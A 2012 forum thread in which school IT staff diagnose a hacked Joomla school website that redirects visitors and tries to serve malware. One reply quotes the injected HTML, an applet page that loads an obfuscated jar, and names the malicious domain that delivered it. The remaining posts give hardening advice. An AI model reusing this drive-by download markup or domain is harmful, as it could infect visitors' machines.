+ Post New Thread
Results 1 to 12 of 12
Internet Related/Filtering/Firewall Thread, Website being redirected to www.google.co.uk in Technical; Hi there, The wife has just told me that her school are having issues looking at there website. When going ...
  1. #1
    bodminman's Avatar
    Join Date
    Apr 2007
    Location
    Sunny Suffolk
    Posts
    1,153
    Thank Post
    724
    Thanked 224 Times in 116 Posts
    Rep Power
    85

    Website being redirected to www.google.co.uk

    Hi there,

    The wife has just told me that her school are having issues looking at there website.

    When going straight to it Home / St Mary's RCPS Lowestoft it goes to the site, well it has here on our IE9 laptop but my iPad just sends me to google.co.uk

    If you google search for st Mary's school Lowestoft and then click on the link in the search results, you just get sent to google.co.uk

    Any ideas?

    Thanks

  2. #2


    Join Date
    Feb 2007
    Location
    51.403651, -0.515458
    Posts
    9,030
    Thank Post
    231
    Thanked 2,700 Times in 1,994 Posts
    Rep Power
    792
    Unfortunately it looks like the website has been hacked. When I visit it (via a Google search), it tries to download a dodgy looking Java app from h**p://oxigiqt.lflinkup.com/PJeHubmUDaovPDRCJxGMEzlYXdvvppcg.

    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <html>
    <head>
    	<title>be84eb392b</title>
    </head>
    <body>
    <applet code="nsyvusn.satytvvkbvuljter.class" archive="vayrsrgvtmshlqyvuljjenq.jar" width="100" height="100">
    <param name="dyarjhw" value="654c9ec7e361b9f69c180175e2c8ce771c9e9803b246ceca97b6af0238eb0644d1bb15a2a70d562e65ca84f0daf19d467463e085ea756a1a42a578884f198c" />
    </applet>
    </body>
    </html>
    Does the school have a backup of the website?

  3. Thanks to Arthur from:

    bodminman (15th September 2012)

  4. #3
    bodminman's Avatar
    Join Date
    Apr 2007
    Location
    Sunny Suffolk
    Posts
    1,153
    Thank Post
    724
    Thanked 224 Times in 116 Posts
    Rep Power
    85
    Thanks for that.

    I shall give the wife the good news. It's all been done in house so god knows if they have a backup or not!

    There prob I suppose.

  5. #4


    Join Date
    Feb 2007
    Location
    51.403651, -0.515458
    Posts
    9,030
    Thank Post
    231
    Thanked 2,700 Times in 1,994 Posts
    Rep Power
    792
    Let's hope so.

    What is really strange about it, is that I no longer get redirected to that domain above (just Google - like you). I reckon if I installed an old version of Java and/or Flash Player I would probably get infected with a trojan. Not sure I want to try that.

  6. #5
    bodminman's Avatar
    Join Date
    Apr 2007
    Location
    Sunny Suffolk
    Posts
    1,153
    Thank Post
    724
    Thanked 224 Times in 116 Posts
    Rep Power
    85
    A restore has just been done albeit from a backup in May but at least they have something to start from again.

    Has anyone any advice I could pass on re locking down a Joomla 1.5 site?

    Thanks

  7. #6
    grant_girdwood's Avatar
    Join Date
    Jun 2012
    Location
    Bloxx HQ
    Posts
    54
    Thank Post
    2
    Thanked 11 Times in 10 Posts
    Rep Power
    6
    Quote Originally Posted by bodminman View Post
    Has anyone any advice I could pass on re locking down a Joomla 1.5 site?

    Thanks
    Best bet would be to 1) upgrade to the latest version of Joomla (2.5.7) (2) ensure permissions are correct on directories and finally (3) ensure that all passwords for accessing are nice and strong.


  8. Thanks to grant_girdwood from:

    bodminman (16th September 2012)

  9. #7


    Join Date
    Feb 2007
    Location
    51.403651, -0.515458
    Posts
    9,030
    Thank Post
    231
    Thanked 2,700 Times in 1,994 Posts
    Rep Power
    792
    A few more...

    3b) Don't forget to change the FTP password.
    4) Ensure all third-party Joomla extensions/plug-ins are up-to-date.
    5) Upgrade PHP to the latest supported release (v5.3.16 or v5.4.6) since the website is currently several versions behind on v5.3.14 and PHP is frequently exploited. This may not be possible on some shared webhosts however.
    6) Use Google's Fetch as Google tool to see the website as Google sees it. Read the text in the grey box for more details on how this helps.
    Last edited by Arthur; 16th September 2012 at 10:58 AM.

  10. #8
    bodminman's Avatar
    Join Date
    Apr 2007
    Location
    Sunny Suffolk
    Posts
    1,153
    Thank Post
    724
    Thanked 224 Times in 116 Posts
    Rep Power
    85
    The chap doing the site has just emailed me to say that when we go to h**t://www.stmarysrcps.co.uk it is picking up the site from a folder called public_html instead of www within the Joomla folder structure. He has read that by having things in the Public_html folder itself is a security flaw. Is this correct? If so how does he go about getting the site picked out of the www folder instead?

  11. #9


    tom_newton's Avatar
    Join Date
    Sep 2006
    Location
    Leeds
    Posts
    4,475
    Thank Post
    866
    Thanked 850 Times in 672 Posts
    Rep Power
    196
    Seems unlikley.

    2 key things would be: Keep all software on the webserver up to date, and do NOT use FTP.

  12. Thanks to tom_newton from:

    bodminman (16th September 2012)

  13. #10

    X-13's Avatar
    Join Date
    Jan 2011
    Location
    /dev/null
    Posts
    9,144
    Thank Post
    596
    Thanked 1,961 Times in 1,359 Posts
    Blog Entries
    19
    Rep Power
    818
    Quote Originally Posted by Arthur View Post
    Unfortunately it looks like the website has been hacked.
    Why are people hacking school websites?

  14. #11

    AngryTechnician's Avatar
    Join Date
    Oct 2008
    Posts
    3,730
    Thank Post
    698
    Thanked 1,212 Times in 761 Posts
    Rep Power
    394
    Quote Originally Posted by X-13 View Post
    Why are people hacking school websites?
    A lot of them use bots that don't care about the content of the site, they just look for vulnerabilities in whatever CMS is being used and then drop link spam or malware onto them automatically.

  15. #12

    X-13's Avatar
    Join Date
    Jan 2011
    Location
    /dev/null
    Posts
    9,144
    Thank Post
    596
    Thanked 1,961 Times in 1,359 Posts
    Blog Entries
    19
    Rep Power
    818
    Quote Originally Posted by AngryTechnician View Post
    A lot of them use bots that don't care about the content of the site, they just look for vulnerabilities in whatever CMS is being used and then drop link spam or malware onto them automatically.
    Attachment 15204.

SHARE:
+ Post New Thread

Similar Threads

  1. Anyone else having problems connecting to Google.co.uk today?
    By Dos_Box in forum Internet Related/Filtering/Firewall
    Replies: 8
    Last Post: 2nd April 2012, 01:36 PM
  2. Any one used www.pixmania.co.uk
    By Kyle in forum General Chat
    Replies: 10
    Last Post: 30th November 2007, 09:26 AM
  3. www.novatech.co.uk
    By ninjabeaver in forum Recommended Suppliers
    Replies: 22
    Last Post: 29th March 2007, 01:53 PM
  4. www.ratemyteachers.co.uk
    By acb_ in forum General Chat
    Replies: 14
    Last Post: 26th November 2006, 08:59 PM
  5. www.ijteducation.co.uk
    By Fletcher_Bravo in forum Recommended Suppliers
    Replies: 0
    Last Post: 6th July 2006, 06:02 PM

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •